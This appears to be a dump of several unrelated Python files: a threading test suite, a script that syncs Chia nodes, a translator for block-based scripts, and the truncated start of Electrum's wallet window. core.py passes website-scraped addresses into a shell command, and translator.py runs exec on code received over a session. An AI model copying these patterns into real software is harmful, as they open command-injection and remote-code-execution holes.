print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegexpMatches(repr(t), r'^<TestThread\(.*, \w+ -?\d+\)>$')
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertIsNotNone(ident[0])
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
@test.test_support.cpython_only
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertFalse(t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
@test.test_support.cpython_only
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
@test.test_support.cpython_only
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, '')
self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getcheckinterval()
# Make the bug more likely to manifest.
sys.setcheckinterval(10)
try:
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
finally:
sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@cpython_only
@unittest.skipIf(_testcapi is None, "need _testcapi module")
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_print_exception(self):
script = r"""if 1:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1.0/0.0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, '')
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if 1:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1.0/0.0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, '')
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if 1:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1.0/0.0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, '')
self.assertNotIn("Unhandled exception", err)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
print("GEVENT: Begin main")
test_main()
|
core.py
|
import os
import random
import requests
import json
import re
import time
import threading
import subprocess
from Utils import ReadConfig
import command
regex_ip = re.compile(r'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
regex_site = re.compile(r'^[0-9a-zA-Z\-]{1,16}\.[0-9a-zA-Z\-]{1,16}\.[0-9a-zA-Z\-]{2,10}$')
def async_run(f, *args, **kwargs):
td = threading.Thread(target=f, args=(*args, *kwargs,))
td.start()
def get_nodes():
url = 'https://chia.woele.cc/chia/'
headers = {
'User-Agent': f'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.{random.randint(1000, 9999)}.212 Safari/537.36',
'Cookie': f'guardret=b1GroZYUgZ33{random.randint(10000,99999)}VIyXw=='
}
resp = requests.get(url, headers=headers, timeout=10)
resp.encoding = 'utf-8'
# print(resp.text)
result = re.findall(r'<tbody class="table-hover">(.*?)</tbody>',resp.text,re.S)[0]
# print(result)
nodes = re.findall(r'<td class="text-left">(.*?)</td>', result)
nodes = [i for i in nodes if len(regex_site.findall(i)) > 0 or len(regex_ip.findall(i)) > 0]
with open('nodes.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(nodes))
def connect_nodes(dir, ListWidgetSignal, ):
try:
filename = 'nodes.json'
with open(filename, encoding='utf-8') as f:
nodes = json.loads(f.read())
print(nodes)
ListWidgetSignal(f'共有节点数据{len(nodes)}条')
def f(cmd, ):
# print(command)
# ListWidgetSignal(command)
print(cmd)
subprocess.call(cmd,shell=True)
# print(res)
for i in nodes:
command = f'{dir}\\resources\\app.asar.unpacked\\daemon\\chia.exe show -a {i}:8444'
async_run(f, command)
ListWidgetSignal(f'正在同步节点->{i}')
time.sleep(1)
except Exception as e:
ListWidgetSignal(f'{e}')
if __name__=='__main__':
config = ReadConfig('node.ini')
print(config)
while True:
try:
get_nodes()
except Exception as e:
print(f'Failed to get node list,use old list ErrorDetail-->{e}')
connect_nodes(config['chia_path'])
time.sleep(int(config['time_interval'])*60)
|
translator.py
|
import re
import threading
def parse_text(session, args):
bytes_list = args[0].split(',')
bytes_array = bytearray([int(i) for i in bytes_list]).decode()
sentences = bytes_array.split('\n')
var_dict = dict()
executable_file = ''
for i in range(3):
try:result_apis = re.findall("^(.*) += *(.*)\('(.*)'\)", sentences[i])[0]
except:break
if result_apis[1] == 'GetModel3D':
model_name = [result_apis[0], result_apis[2]]
elif result_apis[1] == 'GetSimulation':
simulation_name = [result_apis[0], result_apis[2]]
in_block=False
blocks = list()
session.blocks = blocks
for i in range(3,len(sentences)):
sentence = sentences[i]
server_result = re.findall("(\t*)(.*) \((.*)\) {}".format('{'), sentence)
if len(server_result)>0:
in_block = True
sentences_block = ''
current_args = ''
current_sep = server_result[0][0]
if server_result[0][1]==model_name[0]:
current_block = Block('model3D', model_name[1], session, blocks)
elif server_result[0][1]==simulation_name[0]:
current_block = Block('CFD', simulation_name[1],session, blocks)
if len(server_result[0][2].split(','))>0:
current_args = server_result[0][2]
current_block.set_args(current_args)
current_block.return_string = ''
current_block.return_values = ''
continue
if re.search(".*}.*", sentence):
in_block=False
current_block.set_string(sentences_block)
blocks.append(current_block)
index = blocks.index(current_block)
executable_file += current_sep + current_block.return_string + "blocks[{}]({})\n".format(index, current_args)
continue
elif re.search('.*return \((.*)\)',sentence):
current_block.return_values = re.findall('.*return \((.*)\)', sentence)[0]
current_block.return_string = re.findall('.*return \((.*)\)', sentence)[0]+"," + " = "
continue
if in_block:
sentences_block += sentence+'\n'
continue
executable_file += sentence + "\n"
t = threading.Thread(target=run_exec, name='Execute',args=(executable_file,blocks))
t.start()
def run_exec(executable_file, blocks):
blocks = blocks
exec(compile(executable_file, '<string>', 'exec'))
class Block(object):
def __init__(self, server, API, session, blocks_list):
self.server = server
self.API = API
self.session = session
self.blocks_list = blocks_list
self.return_values = None
def set_string(self, string):
self.block_string = string
def set_args(self, args):
self.args = args
def __call__(self, *args):
self.run_thread(*args)
self.flag = True
while self.flag:
import time
time.sleep(5)
pass
return self.return_values
def run_thread(self, *args):
var_dict = dict()
index = self.blocks_list.index(self)
if len(args)>0:
args_name = self.args.split(',')
for i in range(len(args_name)):
if isinstance(args[i], str):
var_dict['{}'.format(args_name[i])] = "'" + args[i] + "'"
else:
var_dict['{}'.format(args_name[i])] = args[i]
var_dict['return_values'] = self.return_values
var_dict['index'] = index
var_dict['receiver'] = 'design'
socket = self.session.__getattribute__('socket_{}'.format(self.server))
socket.send({'execute_block': [self.block_string, var_dict]})
def response_blocks(session, args):
session.blocks[args[0]].return_values = args[1::]
session.blocks[args[0]].flag = False
class Model3DVar(object):
def __init__(self, session, API):
self.session = session
self.API = API
class SimulationVar(object):
def __init__(self, session, API):
self.session = session
self.API = API
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
from electrum.util import bh2u, bfh
from . import icons_rc
from electrum import keystore
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, Multisig_Wallet
try:
from electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from electrum import ELECTRUM_VERSION
import re
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
